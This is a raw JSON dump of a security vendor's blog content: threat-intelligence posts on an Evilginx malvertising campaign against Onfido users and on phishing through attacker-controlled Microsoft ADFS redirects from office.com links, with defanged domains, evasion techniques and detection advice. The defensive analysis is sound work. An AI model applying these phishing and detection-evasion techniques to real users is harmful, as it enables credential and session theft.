",[],{},{"nodeType":312,"data":69497,"content":69501},{"target":69498},{"sys":69499},{"id":69500,"type":317,"linkType":318},"7csybR6fJlCWsRy91CbNYL",[],{"nodeType":178,"data":69503,"content":69504},{},[69505],{"nodeType":173,"value":69506,"marks":69507,"data":69508},"That said, there was evidence to suggest that the domain required a specific URL path — namely, the page must be accessed via Google ads to load. When the page was accessed without the correct parameters set, we were forwarded to a nonexistent page within the legitimate onfido.com domain, resulting in a 404 error.",[],{},{"nodeType":312,"data":69510,"content":69514},{"target":69511},{"sys":69512},{"id":69513,"type":317,"linkType":318},"658fTppp0l1YkoMERiQ1Oj",[],{"nodeType":231,"data":69516,"content":69517},{},[],{"nodeType":169,"data":69519,"content":69520},{},[69521],{"nodeType":173,"value":69522,"marks":69523,"data":69525},"What’s interesting about the domain?",[69524],{"type":370},{},{"nodeType":178,"data":69527,"content":69528},{},[69529,69533,69542],{"nodeType":173,"value":69530,"marks":69531,"data":69532},"One of the things that really stood out to us was the hosting domain — ",[],{},{"nodeType":186,"data":69534,"content":69536},{"uri":69535},"http://us.com",[69537],{"nodeType":173,"value":69538,"marks":69539,"data":69541},"us.com",[69540],{"type":194},{},{"nodeType":173,"value":69543,"marks":69544,"data":69545},". Unlike the official government TLD .us, us.com is designed to look and feel legit but does not require any US affiliation or evidence of a US presence. This isn’t a TLD, it’s just a domain selling subdomains within their domain. This means there’s no WHOIS information available on the domains. ",[],{},{"nodeType":312,"data":69547,"content":69551},{"target":69548},{"sys":69549},{"id":69550,"type":317,"linkType":318},"7HtOWLePxPclyfODqC0oR",[],{"nodeType":178,"data":69553,"content":69554},{},[69555],{"nodeType":173,"value":69556,"marks":69557,"data":69558},"This is incredibly deceptive to the user and will fool many people glancing at the link. It doesn’t look as obviously suspicious as your .xyz or .biz and has the feel of a legitimate domain. It’s also incredibly cheap to pick up .us.com domains right now. ",[],{},{"nodeType":312,"data":69560,"content":69564},{"target":69561},{"sys":69562},{"id":69563,"type":317,"linkType":318},"5CHWwlH2ZFZiVOQWMpkquy",[],{"nodeType":178,"data":69566,"content":69567},{},[69568,69572,69581],{"nodeType":173,"value":69569,"marks":69570,"data":69571},"You can find additional information on ",[],{},{"nodeType":186,"data":69573,"content":69575},{"uri":69574},"https://urlscan.io/result/0196338c-75ea-720c-a0e4-c2898acc4779/",[69576],{"nodeType":173,"value":69577,"marks":69578,"data":69580},"urlscan",[69579],{"type":194},{},{"nodeType":173,"value":69582,"marks":69583,"data":69584}," here.",[],{},{"nodeType":312,"data":69586,"content":69590},{"target":69587},{"sys":69588},{"id":69589,"type":317,"linkType":318},"6hdBHT8SrC6z7O0gIc7xnh",[],{"nodeType":312,"data":69592,"content":69596},{"target":69593},{"sys":69594},{"id":69595,"type":317,"linkType":318},"3KxFiCeGlk7fVC8k1oo7cX",[],{"nodeType":231,"data":69598,"content":69599},{},[],{"nodeType":169,"data":69601,"content":69602},{},[69603],{"nodeType":173,"value":69604,"marks":69605,"data":69607},"Isn’t Evilginx a red team tool?",[69606],{"type":370},{},{"nodeType":178,"data":69609,"content":69610},{},[69611],{"nodeType":173,"value":69612,"marks":69613,"data":69614},"Evilginx is nominally a red team tool, but we frequently spot it being used in phishing campaigns against our customers. Evilginx is a great choice for attackers looking to target non-standard web apps because it is capable of emulating a range of domains — it’s designed to be flexible and work for any page without generating a load of custom JavaScript that might stand out to security tools/analysts. ",[],{},{"nodeType":178,"data":69616,"content":69617},{},[69618],{"nodeType":173,"value":69619,"marks":69620,"data":69621},"If you want to see an example of Evilginx being used to phish a user, check out the example below. ",[],{},{"nodeType":312,"data":69623,"content":69627},{"target":69624},{"sys":69625},{"id":69626,"type":317,"linkType":318},"7IuP0mcRZJkL8YGNoZo5Dj",[],{"nodeType":231,"data":69629,"content":69630},{},[],{"nodeType":169,"data":69632,"content":69633},{},[69634],{"nodeType":173,"value":69635,"marks":69636,"data":69638},"What can you do about it?",[69637],{"type":370},{},{"nodeType":178,"data":69640,"content":69641},{},[69642],{"nodeType":173,"value":69643,"marks":69644,"data":69645},"There’s not a huge amount of impartial advice to give here unfortunately. With malicious Google ads not going away anytime soon, response action is limited. If you are an Onfido user, be sure to block the URL and any related patterns (we noticed that after appearing to have been taken down initially, the site has reappeared at dashboard[.]onfido[.]us[.]com/users/sign_in and no longer appears to require the same URL path). However, it goes without saying that this is a temporary measure and the attacker will no doubt rotate the domain in the near future. ",[],{},{"nodeType":178,"data":69647,"content":69648},{},[69649],{"nodeType":173,"value":69650,"marks":69651,"data":69652},"One good option is to encourage your users to bookmark their links rather than Google searching for the page. If you’re using an IdP with an application dashboard like Okta, Microsoft, or Google, this provides a convenient way to find all your apps in one place. ",[],{},{"nodeType":231,"data":69654,"content":69655},{},[],{"nodeType":169,"data":69657,"content":69658},{},[69659],{"nodeType":173,"value":69660,"marks":69661,"data":69663},"Bonus: How Push stopped the attack",[69662],{"type":370},{},{"nodeType":178,"data":69665,"content":69666},{},[69667],{"nodeType":173,"value":69668,"marks":69669,"data":69670},"Interested in how we stopped the attack?",[],{},{"nodeType":178,"data":69672,"content":69673},{},[69674],{"nodeType":173,"value":69675,"marks":69676,"data":69677},"When the user visited the page, Push detected Evilginx running on the page and blocked the user. Check it out.",[],{},{"nodeType":312,"data":69679,"content":69683},{"target":69680},{"sys":69681},{"id":69682,"type":317,"linkType":318},"5QavzZPS4siFvHCBhpujEe",[],{"nodeType":178,"data":69685,"content":69686},{},[69687],{"nodeType":173,"value":69688,"marks":69689,"data":69690},"Using our browser-based security platform, you can also see all users with an account on Onfido across your workforce. Using Push, you can:",[],{},{"nodeType":250,"data":69692,"content":69693},{},[69694,69704,69714],{"nodeType":254,"data":69695,"content":69696},{},[69697],{"nodeType":178,"data":69698,"content":69699},{},[69700],{"nodeType":173,"value":69701,"marks":69702,"data":69703},"Quickly identify which users have a password-based login set for their account (and therefore could be phished). ",[],{},{"nodeType":254,"data":69705,"content":69706},{},[69707],{"nodeType":178,"data":69708,"content":69709},{},[69710],{"nodeType":173,"value":69711,"marks":69712,"data":69713},"Identify users to enable them to be contacted about the attacks targeting Onfido.",[],{},{"nodeType":254,"data":69715,"content":69716},{},[69717],{"nodeType":178,"data":69718,"content":69719},{},[69720],{"nodeType":173,"value":69721,"marks":69722,"data":69723},"Set an app banner for Onfido warning users of the attacks and guiding them to access and login to the app via your SSO solution. ",[],{},{"nodeType":312,"data":69725,"content":69729},{"target":69726},{"sys":69727},{"id":69728,"type":317,"linkType":318},"23B4EHUs1vt0se5r1cUI4t",[],{"nodeType":235,"data":69731,"content":69732},{},[69733],{"nodeType":173,"value":461,"marks":69734,"data":69736},[69735],{"type":370},{},{"nodeType":178,"data":69738,"content":69739},{},[69740],{"nodeType":173,"value":69741,"marks":69742,"data":69743},"It doesn’t stop there — Push provides comprehensive identity attack detection and response capabilities against techniques like credential stuffing, password spraying and session hijacking using stolen session tokens. You can also use Push to find and fix identity vulnerabilities across every app that your employees use like: ghost logins; SSO coverage gaps; MFA gaps; weak, breached and reused passwords; risky OAuth integrations; and more. ",[],{},{"nodeType":178,"data":69745,"content":69746},{},[69747,69751,69757],{"nodeType":173,"value":69748,"marks":69749,"data":69750},"If you want to learn more about how Push helps you to detect and defeat advanced identity attack techniques in the browser, ",[],{},{"nodeType":186,"data":69752,"content":69753},{"uri":1469},[69754],{"nodeType":173,"value":476,"marks":69755,"data":69756},[],{},{"nodeType":173,"value":69758,"marks":69759,"data":69760}," for a live demo.",[],{},"Investigating a recent malvertising campaign targeting Onfido customers","We recently investigated a malvertising campaign using Evilginx to target Onfido customers via Google ads.","2025-04-15T00:00:00.000Z","investigating-a-recent-malvertising-campaign-targeting-onfido-customers",{"items":69766},[69767,69769],{"sys":69768,"name":505},{"id":504},{"sys":69770,"name":509},{"id":508},{"items":69772},[69773],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":69774},{"url":8615},{"__typename":1528,"sys":69776,"content":69778,"title":70368,"synopsis":70369,"hashTags":118,"publishedDate":70370,"slug":70371,"tagsCollection":70372,"authorsCollection":70378},{"id":69777},"5y6UUG3mMTu1dFhtKO0AUT",{"json":69779},{"data":69780,"content":69781,"nodeType":165},{},[69782,69789,69796,69816,69823,69842,69849,69852,69860,69867,69874,69880,69887,69932,69974,69982,69989,70009,70045,70051,70058,70064,70071,70079,70109,70115,70118,70125,70145,70165,70195,70200,70203,70211,70218,70311,70314,70321,70337,70344,70351],{"data":69783,"content":69784,"nodeType":178},{},[69785],{"data":69786,"marks":69787,"value":69788,"nodeType":173},{},[],"Everything we do at Push is research-driven. Our detections for phishing attacks were created through hands-on analysis of phishing kits that our customers have been targeted with. This gives us a steady supply of all manner of modern Attacker-in-the-Middle phishing kits to analyze — from the classic Evilginx-style phish kit to professionalized criminal as-a-Service infrastructure. ",{"data":69790,"content":69791,"nodeType":178},{},[69792],{"data":69793,"marks":69794,"value":69795,"nodeType":173},{},[],"In our most recent phish kit teardown, we encountered a standard reverse-proxy clone of a Microsoft login page — nothing unusual at first glance. But increasingly, a lot of the innovation comes outside of the phishing page itself. ",{"data":69797,"content":69798,"nodeType":178},{},[69799,69803,69812],{"data":69800,"marks":69801,"value":69802,"nodeType":173},{},[],"The art in detection evasion comes from being able to successfully deliver the page to a user and have them open the page without it being intercepted by an email security, proxy scanner, URL TI feed, or web analysis tool. To achieve this, the attacker found a way to redirect from a legitimate ",{"data":69804,"content":69806,"nodeType":186},{"uri":69805},"http://outlook.office.com",[69807],{"data":69808,"marks":69809,"value":69811,"nodeType":173},{},[69810],{"type":194},"outlook.office.com",{"data":69813,"marks":69814,"value":69815,"nodeType":173},{},[]," link to a phishing website. ",{"data":69817,"content":69818,"nodeType":178},{},[69819],{"data":69820,"marks":69821,"value":69822,"nodeType":173},{},[],"This is essentially an open redirect vulnerability — maybe not the classic example where someone has forgotten to do input sanitization on their website, but the outcome is the same.",{"data":69824,"content":69825,"nodeType":178},{},[69826,69830,69838],{"data":69827,"marks":69828,"value":69829,"nodeType":173},{},[],"Central to our analysis was the use of our timelines feature, ",{"data":69831,"content":69832,"nodeType":186},{"uri":59420},[69833],{"data":69834,"marks":69835,"value":69837,"nodeType":173},{},[69836],{"type":194},"part of our latest Detections feature release",{"data":69839,"marks":69840,"value":69841,"nodeType":173},{},[],". I’m not going to talk in any detail about this, but the TL;DR is that it allows us to trace back the entire chain of browsing activity leading up to a detection — showing the full (sometimes lengthy) redirect chain from the initial link delivery source to the actual phishing page, tabs opened and closed, popup windows, forms submitted, passwords entered, and more. ",{"data":69843,"content":69844,"nodeType":178},{},[69845],{"data":69846,"marks":69847,"value":69848,"nodeType":173},{},[],"First, let’s go through the steps of my investigation before looking at the findings (and the implications for phishing detection evasion techniques). ",{"data":69850,"content":69851,"nodeType":231},{},[],{"data":69853,"content":69854,"nodeType":169},{},[69855],{"data":69856,"marks":69857,"value":69859,"nodeType":173},{},[69858],{"type":370},"Investigation walkthrough",{"data":69861,"content":69862,"nodeType":178},{},[69863],{"data":69864,"marks":69865,"value":69866,"nodeType":173},{},[],"As I opened with, there was nothing especially notable about the phishing page itself — a standard reverse-proxy AitM page designed to intercept the user’s session as they authenticate, bypassing MFA in the process. ",{"data":69868,"content":69869,"nodeType":178},{},[69870],{"data":69871,"marks":69872,"value":69873,"nodeType":173},{},[],"This was not targeted delivery — employees from several customers were impacted. I’ve included an example of how one user arrived at the site below.",{"data":69875,"content":69879,"nodeType":312},{"target":69876},{"sys":69877},{"id":69878,"type":317,"linkType":318},"51MnOL9XqQDkllK2Jer4S9",[],{"data":69881,"content":69882,"nodeType":178},{},[69883],{"data":69884,"marks":69885,"value":69886,"nodeType":173},{},[],"This one stood out to me for a few reasons. ",{"data":69888,"content":69889,"nodeType":250},{},[69890,69900,69922],{"data":69891,"content":69892,"nodeType":254},{},[69893],{"data":69894,"content":69895,"nodeType":178},{},[69896],{"data":69897,"marks":69898,"value":69899,"nodeType":173},{},[],"The user had accessed the malicious link from Google search. They searched “Office 265\" (a typo presumably), clicked a link, and were taken to an Office login page.",{"data":69901,"content":69902,"nodeType":254},{},[69903],{"data":69904,"content":69905,"nodeType":178},{},[69906,69910,69918],{"data":69907,"marks":69908,"value":69909,"nodeType":173},{},[],"The Outlook link had a number of Google Ads tracking parameters attached, meaning they clicked an ad, not an organic link — making this a ",{"data":69911,"content":69913,"nodeType":186},{"uri":69912},"https://pushsecurity.github.io/phishing-techniques/techniques/malvertising/",[69914],{"data":69915,"marks":69916,"value":8046,"nodeType":173},{},[69917],{"type":194},{"data":69919,"marks":69920,"value":69921,"nodeType":173},{},[]," attack. ",{"data":69923,"content":69924,"nodeType":254},{},[69925],{"data":69926,"content":69927,"nodeType":178},{},[69928],{"data":69929,"marks":69930,"value":69931,"nodeType":173},{},[],"Another domain — bluegraintours[.]com — was in the URL path, after which they were redirected to the Microsoft-impersonating phishing site (login-microsoftonline[.]offirmtm[.]com ...). ",{"data":69933,"content":69934,"nodeType":178},{},[69935,69939,69948,69952,69959,69963,69970],{"data":69936,"marks":69937,"value":69938,"nodeType":173},{},[],"This got me wondering — how did they get ",{"data":69940,"content":69942,"nodeType":186},{"uri":69941},"http://office.com",[69943],{"data":69944,"marks":69945,"value":69947,"nodeType":173},{},[69946],{"type":194},"office.com",{"data":69949,"marks":69950,"value":69951,"nodeType":173},{},[]," to redirect to the phishing site, and why was the bluegraintours domain in the path of an ",{"data":69953,"content":69954,"nodeType":186},{"uri":69941},[69955],{"data":69956,"marks":69957,"value":69947,"nodeType":173},{},[69958],{"type":194},{"data":69960,"marks":69961,"value":69962,"nodeType":173},{},[]," link? There was no indication that an actual phishing email was interacted with, it seemed to all happen directly from the legitimate ",{"data":69964,"content":69965,"nodeType":186},{"uri":69941},[69966],{"data":69967,"marks":69968,"value":69947,"nodeType":173},{},[69969],{"type":194},{"data":69971,"marks":69972,"value":69973,"nodeType":173},{},[]," link. ",{"data":69975,"content":69976,"nodeType":235},{},[69977],{"data":69978,"marks":69979,"value":69981,"nodeType":173},{},[69980],{"type":370},"Redirecting to a malicious login page via ADFS",{"data":69983,"content":69984,"nodeType":178},{},[69985],{"data":69986,"marks":69987,"value":69988,"nodeType":173},{},[],"From memory, I knew that the tenant name can appear in the URL when you’re accessing a specific Microsoft tenant for your organization — essentially a domain-specific landing page. ",{"data":69990,"content":69991,"nodeType":178},{},[69992,69996,70005],{"data":69993,"marks":69994,"value":69995,"nodeType":173},{},[],"It turns out the attacker had set up a custom Microsoft tenant with ",{"data":69997,"content":69999,"nodeType":186},{"uri":69998},"https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview",[70000],{"data":70001,"marks":70002,"value":70004,"nodeType":173},{},[70003],{"type":194},"Active Directory Federation Services (ADFS)",{"data":70006,"marks":70007,"value":70008,"nodeType":173},{},[]," configured. If you’re not familiar, ADFS is an SSO solution that is often used to connect on-premises Active Directory with cloud services like Microsoft 365 or Azure Active Directory. This means Microsoft will perform the redirect to the custom malicious domain. ",{"data":70010,"content":70011,"nodeType":178},{},[70012,70016,70023,70027,70036,70040],{"data":70013,"marks":70014,"value":70015,"nodeType":173},{},[],"This is strikingly similar to ",{"data":70017,"content":70018,"nodeType":186},{"uri":63250},[70019],{"data":70020,"marks":70021,"value":63256,"nodeType":173},{},[70022],{"type":194},{"data":70024,"marks":70025,"value":70026,"nodeType":173},{},[],", a technique I’ve ",{"data":70028,"content":70030,"nodeType":186},{"uri":70029},"https://pushsecurity.com/blog/samljacking-a-poisoned-tenant/",[70031],{"data":70032,"marks":70033,"value":70035,"nodeType":173},{},[70034],{"type":194},"blogged about previously",{"data":70037,"marks":70038,"value":70039,"nodeType":173},{},[]," which allows you to change the identity provider domain that an application’s users authenticate through. Attackers can change this link to their phishing page that proxies the legitimate site to phish users through legitimate sign-in links — ",{"data":70041,"marks":70042,"value":70044,"nodeType":173},{},[70043],{"type":370},"so I guess that makes this ADFSjacking?",{"data":70046,"content":70050,"nodeType":312},{"target":70047},{"sys":70048},{"id":70049,"type":317,"linkType":318},"3BXyDhMC69355gLRqyIwQP",[],{"data":70052,"content":70053,"nodeType":178},{},[70054],{"data":70055,"marks":70056,"value":70057,"nodeType":173},{},[],"I had initially assumed that bluegraintours was a legitimate website that had been compromised by the attacker and used as a redirect, which is pretty common behavior for threat groups. However, it turns out that it’s actually a fake website that the attackers have probably vibe-coded. ",{"data":70059,"content":70063,"nodeType":312},{"target":70060},{"sys":70061},{"id":70062,"type":317,"linkType":318},"1hnWJ0jgsPqRELDqUeFzf3",[],{"data":70065,"content":70066,"nodeType":178},{},[70067],{"data":70068,"marks":70069,"value":70070,"nodeType":173},{},[],"It’s worth noting that this isn’t something that the phishing victim would see as part of the attack — it’s purely used as an invisible redirect. This is most likely to be an attempt to mask the nature of the domain for domain categorization purposes, which is typical for proxy-based solutions to prevent users from browsing to unapproved things — this way, automated scanners will classify it as a travel blog. ",{"data":70072,"content":70073,"nodeType":235},{},[70074],{"data":70075,"marks":70076,"value":70078,"nodeType":173},{},[70077],{"type":370},"Conditional loading interrupted the page analysis",{"data":70080,"content":70081,"nodeType":178},{},[70082,70086,70094,70098,70105],{"data":70083,"marks":70084,"value":70085,"nodeType":173},{},[],"While the user was taken to the phishing page at the end of the chain, ",{"data":70087,"content":70089,"nodeType":186},{"uri":70088},"https://pushsecurity.github.io/phishing-techniques/techniques/conditional-loading/",[70090],{"data":70091,"marks":70092,"value":7856,"nodeType":173},{},[70093],{"type":194},{"data":70095,"marks":70096,"value":70097,"nodeType":173},{},[]," restrictions prevented us from recreating the full attack flow when loading the initial link clicked by the user. This happens when certain conditions of the page load aren’t met. Because the kit decides I’m not a valid target, I’m redirected back to ",{"data":70099,"content":70100,"nodeType":186},{"uri":69941},[70101],{"data":70102,"marks":70103,"value":69947,"nodeType":173},{},[70104],{"type":194},{"data":70106,"marks":70107,"value":70108,"nodeType":173},{},[],". However, we were able to skip ahead and bypass the conditional loading to access the phishing server directly. ",{"data":70110,"content":70114,"nodeType":312},{"target":70111},{"sys":70112},{"id":70113,"type":317,"linkType":318},"68rW6CHJOJ2u3mCc08lGvZ",[],{"data":70116,"content":70117,"nodeType":231},{},[],{"data":70119,"content":70120,"nodeType":169},{},[70121],{"data":70122,"marks":70123,"value":8221,"nodeType":173},{},[70124],{"type":370},{"data":70126,"content":70127,"nodeType":178},{},[70128,70132,70141],{"data":70129,"marks":70130,"value":70131,"nodeType":173},{},[],"While this isn’t a vulnerability per se, the ability for attackers to add their own Microsoft ADFS server to host their phishing page and have Microsoft redirect to it is a concerning development that will make URL-based detections even more challenging than they already are. ",{"data":70133,"content":70135,"nodeType":186},{"uri":70134},"https://pushsecurity.github.io/phishing-techniques/techniques/trusted-website-hosting/",[70136],{"data":70137,"marks":70138,"value":70140,"nodeType":173},{},[70139],{"type":194},"Hosting phishing links on trusted third-party websites",{"data":70142,"marks":70143,"value":70144,"nodeType":173},{},[]," is a highly effective way of both bypassing URL-based detections and implementing layers of obfuscation in their phishing delivery chain that can break automated analysis tools.  ",{"data":70146,"content":70147,"nodeType":178},{},[70148,70152,70161],{"data":70149,"marks":70150,"value":70151,"nodeType":173},{},[],"This is basically the equivalent to ",{"data":70153,"content":70155,"nodeType":186},{"uri":70154},"http://outlook.com",[70156],{"data":70157,"marks":70158,"value":70160,"nodeType":173},{},[70159],{"type":194},"Outlook.com",{"data":70162,"marks":70163,"value":70164,"nodeType":173},{},[]," having an open redirect vulnerability, which would be a huge deal in the eyes of most security practitioners. In practice, it’s a little harder for the average attacker to make use of this, but anyone that is willing to create a Microsoft tenant and set up ADFS could create similar phishing infrastructure  — which only requires passing a credit card check. ",{"data":70166,"content":70167,"nodeType":178},{},[70168,70172,70179,70183,70191],{"data":70169,"marks":70170,"value":70171,"nodeType":173},{},[],"The other notable component to this attack is the use of ",{"data":70173,"content":70174,"nodeType":186},{"uri":69912},[70175],{"data":70176,"marks":70177,"value":8046,"nodeType":173},{},[70178],{"type":194},{"data":70180,"marks":70181,"value":70182,"nodeType":173},{},[]," as the lure delivery channel. This is a trend we spotted recently with ",{"data":70184,"content":70185,"nodeType":186},{"uri":14287},[70186],{"data":70187,"marks":70188,"value":70190,"nodeType":173},{},[70189],{"type":194},"Scattered Spider’s use of Onfido-based malvertising lures",{"data":70192,"marks":70193,"value":70194,"nodeType":173},{},[],". Malvertising is a great way for attackers to sidestep phishing controls placed at the email layer (where the majority are) and, as in this case, can create a highly-convincing and difficult-to-spot phishing scenario.  ",{"data":70196,"content":70199,"nodeType":312},{"target":70197},{"sys":70198},{"id":8590,"type":317,"linkType":318},[],{"data":70201,"content":70202,"nodeType":231},{},[],{"data":70204,"content":70205,"nodeType":169},{},[70206],{"data":70207,"marks":70208,"value":70210,"nodeType":173},{},[70209],{"type":370},"Detection recommendations",{"data":70212,"content":70213,"nodeType":178},{},[70214],{"data":70215,"marks":70216,"value":70217,"nodeType":173},{},[],"There are a couple of tool-agnostic hardening options that can used to limit exposure to the specifics of this attack:",{"data":70219,"content":70220,"nodeType":250},{},[70221,70231,70252],{"data":70222,"content":70223,"nodeType":254},{},[70224],{"data":70225,"content":70226,"nodeType":178},{},[70227],{"data":70228,"marks":70229,"value":70230,"nodeType":173},{},[],"Monitoring for ADFS redirects in proxy logs that could be malicious, i.e. login.microsoftonline.com redirecting to another domain with /adfs/ls/ in the path. Many organizations do not use ADFS, while those that do should be able to filter legitimate ones to their legitimate domain relatively easily. ",{"data":70232,"content":70233,"nodeType":254},{},[70234],{"data":70235,"content":70236,"nodeType":178},{},[70237,70241,70248],{"data":70238,"marks":70239,"value":70240,"nodeType":173},{},[],"Monitoring for Google redirects to ",{"data":70242,"content":70243,"nodeType":186},{"uri":69941},[70244],{"data":70245,"marks":70246,"value":69947,"nodeType":173},{},[70247],{"type":194},{"data":70249,"marks":70250,"value":70251,"nodeType":173},{},[]," with Google ad parameters for more specific detection of malvertising + ADFS hijacking as in this example. ",{"data":70253,"content":70254,"nodeType":254},{},[70255],{"data":70256,"content":70257,"nodeType":178},{},[70258,70262,70271,70274,70283,70286,70295,70298,70307],{"data":70259,"marks":70260,"value":70261,"nodeType":173},{},[],"Deploying ad blockers to all of your browsers to stop malvertising attacks — though this only serves to tackle one of the several possible delivery vectors, such as links delivered using ",{"data":70263,"content":70265,"nodeType":186},{"uri":70264},"https://pushsecurity.github.io/phishing-techniques/techniques/email-legitimate-app/",[70266],{"data":70267,"marks":70268,"value":70270,"nodeType":173},{},[70269],{"type":194},"legitimate third-party services",{"data":70272,"marks":70273,"value":2936,"nodeType":173},{},[],{"data":70275,"content":70277,"nodeType":186},{"uri":70276},"https://pushsecurity.github.io/phishing-techniques/techniques/social-media/",[70278],{"data":70279,"marks":70280,"value":70282,"nodeType":173},{},[70281],{"type":194},"social media",{"data":70284,"marks":70285,"value":2936,"nodeType":173},{},[],{"data":70287,"content":70289,"nodeType":186},{"uri":70288},"https://pushsecurity.github.io/phishing-techniques/techniques/instant-messenger/",[70290],{"data":70291,"marks":70292,"value":70294,"nodeType":173},{},[70293],{"type":194},"instant messenger",{"data":70296,"marks":70297,"value":3949,"nodeType":173},{},[],{"data":70299,"content":70301,"nodeType":186},{"uri":70300},"https://pushsecurity.github.io/phishing-techniques/techniques/email-attachment/",[70302],{"data":70303,"marks":70304,"value":70306,"nodeType":173},{},[70305],{"type":194},"email attachment",{"data":70308,"marks":70309,"value":70310,"nodeType":173},{},[],". (This is one of the limitations of focusing on specific delivery mechanisms — attackers have more to choose from than ever before. It’s not just an email problem). ",{"data":70312,"content":70313,"nodeType":231},{},[],{"data":70315,"content":70316,"nodeType":169},{},[70317],{"data":70318,"marks":70319,"value":2824,"nodeType":173},{},[70320],{"type":370},{"data":70322,"content":70323,"nodeType":178},{},[70324,70328,70334],{"data":70325,"marks":70326,"value":70327,"nodeType":173},{},[],"Push doesn’t detect the redirect tricks, or relies on outdated domain TI feeds. It doesn’t matter what ",{"data":70329,"content":70330,"nodeType":186},{"uri":6820},[70331],{"data":70332,"marks":70333,"value":8545,"nodeType":173},{},[],{"data":70335,"marks":70336,"value":59454,"nodeType":173},{},[],{"data":70338,"content":70339,"nodeType":178},{},[70340],{"data":70341,"marks":70342,"value":70343,"nodeType":173},{},[],"Push’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, password spraying, and session hijacking using stolen session tokens. ",{"data":70345,"content":70346,"nodeType":178},{},[70347],{"data":70348,"marks":70349,"value":70350,"nodeType":173},{},[],"You can also use Push to find and fix identity vulnerabilities across every app that your employees use, including ghost logins; SSO coverage gaps; MFA gaps; weak, breached and reused passwords; risky OAuth integrations; and more.",{"data":70352,"content":70353,"nodeType":178},{},[70354,70357,70365],{"data":70355,"marks":70356,"value":61741,"nodeType":173},{},[],{"data":70358,"content":70359,"nodeType":186},{"uri":473},[70360],{"data":70361,"marks":70362,"value":70364,"nodeType":173},{},[70363],{"type":194},"request a demo.",{"data":70366,"marks":70367,"value":37,"nodeType":173},{},[],"How attackers are using Active Directory Federation Services to phish with legit office.com links","Push recently identified a novel phishing attack using Active Directory Federation Services to get Microsoft to send victims to a phishing site.","2025-08-12T00:00:00.000Z","phishing-with-active-directory-federation-services",{"items":70373},[70374,70376],{"sys":70375,"name":509},{"id":508},{"sys":70377,"name":505},{"id":504},{"items":70379},[70380],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":70381},{"url":8615},{"items":70383},[70384],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":70385},{"url":1496},{"json":70387,"links":70766},{"nodeType":165,"data":70388,"content":70389},{},[70390,70406,70419,70424,70430,70436,70439,70446,70461,70467,70472,70478,70483,70489,70494,70500,70505,70511,70516,70519,70526,70542,70547,70554,70570,70577,70603,70609,70616,70632,70639,70655,70660,70663,70670,70686,70692,70697,70700,70707,70723,70729,70735,70740],{"nodeType":178,"data":70391,"content":70392},{},[70393,70396,70403],{"nodeType":173,"value":58000,"marks":70394,"data":70395},[],{},{"nodeType":186,"data":70397,"content":70398},{"uri":6820},[70399],{"nodeType":173,"value":8157,"marks":70400,"data":70402},[70401],{"type":194},{},{"nodeType":173,"value":197,"marks":70404,"data":70405},[],{},{"nodeType":178,"data":70407,"content":70408},{},[70409,70412,70416],{"nodeType":173,"value":58017,"marks":70410,"data":70411},[],{},{"nodeType":173,"value":58021,"marks":70413,"data":70415},[70414],{"type":370},{},{"nodeType":173,"value":58026,"marks":70417,"data":70418},[],{},{"nodeType":312,"data":70420,"content":70423},{"target":70421},{"sys":70422},{"id":58033,"type":317,"linkType":318},[],{"nodeType":178,"data":70425,"content":70426},{},[70427],{"nodeType":173,"value":58039,"marks":70428,"data":70429},[],{},{"nodeType":178,"data":70431,"content":70432},{},[70433],{"nodeType":173,"value":58046,"marks":70434,"data":70435},[],{},{"nodeType":231,"data":70437,"content":70438},{},[],{"nodeType":169,"data":70440,"content":70441},{},[70442],{"nodeType":173,"value":58056,"marks":70443,"data":70445},[70444],{"type":370},{},{"nodeType":178,"data":70447,"content":70448},{},[70449,70452,70458],{"nodeType":173,"value":58064,"marks":70450,"data":70451},[],{},{"nodeType":186,"data":70453,"content":70454},{"uri":58069},[70455],{"nodeType":173,"value":58072,"marks":70456,"data":70457},[],{},{"nodeType":173,"value":3107,"marks":70459,"data":70460},[],{},{"nodeType":178,"data":70462,"content":70463},{},[70464],{"nodeType":173,"value":58082,"marks":70465,"data":70466},[],{},{"nodeType":312,"data":70468,"content":70471},{"target":70469},{"sys":70470},{"id":58089,"type":317,"linkType":318},[],{"nodeType":178,"data":70473,"content":70474},{},[70475],{"nodeType":173,"value":58095,"marks":70476,"data":70477},[],{},{"nodeType":312,"data":70479,"content":70482},{"target":70480},{"sys":70481},{"id":58102,"type":317,"linkType":318},[],{"nodeType":178,"data":70484,"content":70485},{},[70486],{"nodeType":173,"value":58108,"marks":70487,"data":70488},[],{},{"nodeType":312,"data":70490,"content":70493},{"target":70491},{"sys":70492},{"id":58115,"type":317,"linkType":318},[],{"nodeType":178,"data":70495,"content":70496},{},[70497],{"nodeType":173,"value":58121,"marks":70498,"data":70499},[],{},{"nodeType":312,"data":70501,"content":70504},{"target":70502},{"sys":70503},{"id":58128,"type":317,"linkType":318},[],{"nodeType":178,"data":70506,"content":70507},{},[70508],{"nodeType":173,"value":58134,"marks":70509,"data":70510},[],{},{"nodeType":312,"data":70512,"content":70515},{"target":70513},{"sys":70514},{"id":58141,"type":317,"linkType":318},[],{"nodeType":231,"data":70517,"content":70518},{},[],{"nodeType":169,"data":70520,"content":70521},{},[70522],{"nodeType":173,"value":58150,"marks":70523,"data":70525},[70524],{"type":370},{},{"nodeType":178,"data":70527,"content":70528},{},[70529,70532,70539],{"nodeType":173,"value":58158,"marks":70530,"data":70531},[],{},{"nodeType":186,"data":70533,"content":70534},{"uri":6820},[70535],{"nodeType":173,"value":8157,"marks":70536,"data":70538},[70537],{"type":194},{},{"nodeType":173,"value":58169,"marks":70540,"data":70541},[],{},{"nodeType":312,"data":70543,"content":70546},{"target":70544},{"sys":70545},{"id":58176,"type":317,"linkType":318},[],{"nodeType":235,"data":70548,"content":70549},{},[70550],{"nodeType":173,"value":58182,"marks":70551,"data":70553},[70552],{"type":370},{},{"nodeType":178,"data":70555,"content":70556},{},[70557,70560,70567],{"nodeType":173,"value":58190,"marks":70558,"data":70559},[],{},{"nodeType":186,"data":70561,"content":70562},{"uri":58195},[70563],{"nodeType":173,"value":58198,"marks":70564,"data":70566},[70565],{"type":194},{},{"nodeType":173,"value":58203,"marks":70568,"data":70569},[],{},{"nodeType":235,"data":70571,"content":70572},{},[70573],{"nodeType":173,"value":58210,"marks":70574,"data":70576},[70575],{"type":370},{},{"nodeType":178,"data":70578,"content":70579},{},[70580,70583,70590,70593,7060